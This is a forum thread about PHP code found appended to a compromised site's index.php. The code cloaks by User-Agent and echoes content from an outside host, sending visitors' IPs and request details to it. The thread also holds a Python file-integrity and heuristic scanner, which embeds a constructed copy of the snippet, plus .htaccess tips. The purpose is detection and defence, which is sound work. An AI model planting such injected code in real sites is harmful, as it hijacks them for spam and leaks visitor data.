PHP code on a compromised host

seohug

Dec 16, 2010
I found the following code on a site running on PHP. This site has dropped off my radar for a while and I was just checking out what to do with it. There is no CMS, just PHP files with some includes à la header, footer, etc.

It appears hackers compromised the shared hosting server and dropped it at the end of index.php. It's not found anywhere else.

The code will only show up to Google bots, and not when viewing it via a browser. You can see the dropped links in the cache. Then it will serve links from base. It can do more, as any content can be served within.

PHP:
<?php
/*This code use for global bot statistic*/
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);

/*Looks for google search bot*/
$sReferer = '';
if (isset($_SERVER['HTTP_REFERER']) === true) {
    $sReferer = strtolower($_SERVER['HTTP_REFERER']);
}

if (!(strpos($sUserAgent, 'google') === false)) {
    /*Bot comes*/
    if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
        /*Create bot analitics*/
        echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
            . '&useragent=' . urlencode($sUserAgent)
            . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
            . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
            . '&check=' . isset($_GET['look'])
            . '&ref=' . urlencode($sReferer));
    }
} else {
    if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
        /*Create bot analitics*/
        echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
            . '&useragent=' . urlencode($sUserAgent)
            . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
            . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
            . '&addcheck=' . '&check=' . isset($_GET['look'])
            . '&ref=' . urlencode($sReferer));
    }
}
/*Statistic code end*/
?>

The point here is to check your sites for file changes, or at least the index, for suspicious stuff. HTH
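As an added example (not code from the post or from any of the posters), here is a Python script that does what the last sentence recommends: it hashes the site's PHP files into a baseline, reports files that were added, removed or changed, and scans the changed ones for the two traits of the snippet above, a User-Agent test for "google" and a remote file_get_contents() echoed into the page. The directory layout, file contents, heuristic patterns and the placeholder domain stats.example.invalid are all constructed for the demo; in practice the baseline would be stored somewhere the web server account cannot write.

```python
# Added example: baseline-and-diff integrity check for a PHP site, plus a
# heuristic scan for the traits of the snippet quoted in the post. File names,
# contents, heuristics and the stats.example.invalid domain are all constructed.
import hashlib
import os
import re
import tempfile

# Constructed stand-in for the appended snippet: same shape as the quoted code
# (User-Agent test for "google", remote file_get_contents echoed into the page),
# with a placeholder domain instead of the real one.
INJECTED_SNIPPET = """
<?php /* appended after the legitimate closing tag (constructed sample) */
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (!(strpos($sUserAgent, 'google') === false)) {
    echo file_get_contents('http://stats.example.invalid/Stat.php?ua=' . urlencode($sUserAgent));
}
?>
"""

# Heuristics derived from the quoted snippet. Each is a rule of thumb for this
# demo, not a signature from any product.
UA_READ = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")
UA_GOOGLE_TEST = re.compile(r"strpos\s*\([^)]*['\"]google", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.IGNORECASE)


def hash_tree(root):
    """Map every *.php file under root (path relative to root) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Compare two hash maps; returns sorted lists of added/removed/modified paths."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def scan_for_indicators(php_source):
    """Return the indicator names that fire on one PHP file's text."""
    hits = []
    # Cloaking: the script reads the User-Agent and tests it for "google".
    if UA_READ.search(php_source) and UA_GOOGLE_TEST.search(php_source):
        hits.append("ua_cloaking")
    # Content pulled from a remote host at request time and echoed to the visitor.
    if REMOTE_FETCH.search(php_source):
        hits.append("remote_fetch")
    return hits


def _write(root, rel, text):
    with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Build a constructed site, baseline it, append the snippet to index.php, re-check."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "header.php", "<?php echo '<html><body>'; ?>\n")
        _write(root, "footer.php", "<?php echo '</body></html>'; ?>\n")
        _write(root, "index.php", "<?php include 'header.php'; echo 'Hello'; include 'footer.php'; ?>\n")
        baseline = hash_tree(root)  # keep this where the web server account cannot write

        # Simulate the compromise described in the post: code appended to index.php.
        with open(os.path.join(root, "index.php"), "a", encoding="utf-8") as fh:
            fh.write(INJECTED_SNIPPET)

        changes = diff_baseline(baseline, hash_tree(root))
        flagged = {}
        for rel in changes["added"] + changes["modified"]:
            with open(os.path.join(root, rel), encoding="utf-8") as fh:
                hits = scan_for_indicators(fh.read())
            if hits:
                flagged[rel] = hits
        return {"changes": changes, "flagged": flagged}


if __name__ == "__main__":
    result = demo()
    print("changed files:", result["changes"])
    print("flagged:", result["flagged"])
```

The hash diff is what catches the change regardless of what was appended; the indicator scan only explains why a changed file deserves a look first, and a clean file that legitimately reads the User-Agent or fetches a remote URL will also trip it, so treat hits as a triage order rather than a verdict.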
 


Just a small tip,

If you're concerned about a hack like this, one small precaution you can take is to change the default index, using something like

Code:
DirectoryIndex home.php

in .htaccess

This won't stop the hack, but unless you reference index.php in your code, it'll not be run, so at least the site itself won't be compromised in Google's eyes.

A step further would be to specifically deny index.php in .htaccess rather than 404'ing it.
 
You are sure you pasted the right code?

That code just collects and echoes non-Google users' referrers from openprotect...?